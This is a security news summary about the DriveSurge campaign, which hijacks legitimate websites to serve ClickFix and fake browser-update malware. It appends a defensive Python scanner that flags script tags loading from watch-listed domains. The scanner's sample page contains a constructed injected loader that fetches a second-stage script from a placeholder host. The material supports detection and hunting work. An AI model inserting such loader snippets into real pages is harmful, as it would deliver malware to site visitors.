A threat actor called DriveSurge has compromised thousands of real websites and is using them to redirect visitors into malware traps. Silent Push says the actor operates as an initial access broker, using the zTDS traffic distribution system to decide whether each visitor sees a ClickFix lure that tricks them into running malicious PowerShell commands or a FakeUpdate page posing as browser updates for Chrome, Firefox, Edge, Safari and others; researchers also found macOS-targeting JavaScript and more than 80 malicious injection domains.
Why it matters: People can get infected just by visiting a legitimate site that has been silently hijacked, so the risk extends beyond obviously shady pages. Organizations should hunt for the identified JavaScript injection patterns and domains, and users should only update browsers through the built-in updater and never paste commands from pop-ups into Terminal or PowerShell.
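One way to act on the hunting advice above is to scan saved copies of your own site's pages for `<script>` tags that load from, or reference, the injection domains published for the campaign. The following is an added example written for this summary, not code from Silent Push, BleepingComputer or the article; the domains in `DOMAIN_WATCHLIST`, the hosts in `FIRST_PARTY_HOSTS` and the sample page are constructed placeholders to be replaced with the published indicators and your own first-party hosts.

```python
"""Scan saved HTML pages for <script> tags that load from, or reference,
domains on a watch-list (the hunt the summary recommends).

Added example, not code from Silent Push or the article. The domain
list, allowlist and sample page are constructed placeholders; replace
DOMAIN_WATCHLIST with the indicators published for the campaign."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed placeholders, not real DriveSurge indicators.
DOMAIN_WATCHLIST = {"injection.example.invalid", "tds.example.invalid"}

# Hosts this site legitimately loads scripts from (site-specific allowlist).
FIRST_PARTY_HOSTS = {"www.example.org", "cdn.example.org"}


def _host_of(src: str) -> str:
    # Handle protocol-relative ("//host/x.js") as well as absolute URLs.
    if src.startswith("//"):
        src = "https:" + src
    return urlparse(src).hostname or ""


def _domain_matches(host: str, watchlist) -> bool:
    # Match the host itself or any subdomain of a watch-listed domain.
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in watchlist)


class _ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []   # src values of <script src=...>
        self.inline = []     # bodies of inline <script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def find_suspicious_scripts(html, watchlist=DOMAIN_WATCHLIST,
                            allowed_hosts=FIRST_PARTY_HOSTS):
    """Return a list of (reason, evidence) findings for one page."""
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = _host_of(src)
        if _domain_matches(host, watchlist):
            findings.append(("watchlist-src", src))
        elif host and host.lower() not in allowed_hosts:
            # Unknown third-party script host: review it, not necessarily malicious.
            findings.append(("unknown-third-party-src", src))
    for body in p.inline:
        # Inline loaders that build a script tag pointing at a watch-listed host.
        hits = [d for d in watchlist if d in body.lower()]
        if hits:
            findings.append(("watchlist-in-inline-script", hits[0]))
    return findings


# Constructed sample page: a legitimate site with one injected loader
# and one inline snippet that fetches a second-stage script.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example.org/app.js"></script>
<script src="//cdn.injection.example.invalid/loader.js"></script>
<script>
  var s=document.createElement('script');
  s.src='https://tds.example.invalid/r.php';document.head.appendChild(s);
</script>
</head><body>Hello</body></html>"""

if __name__ == "__main__":
    for reason, evidence in find_suspicious_scripts(SAMPLE_PAGE):
        print(reason, evidence)
```

Run it over HTML fetched from your own web servers (or from the CMS's rendered output) rather than from a browser, so that a visitor-side redirect chain does not get in the way; any "unknown-third-party-src" finding is a review item, while a "watchlist" finding on a page you did not put there is the injection itself.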
Bill Toulas
2026.06.01
This article appears to be the first tracked item establishing Silent Push's reporting on the DriveSurge campaign, its use of zTDS, and its large-scale website hijacking for ClickFix and FakeUpdate malware delivery.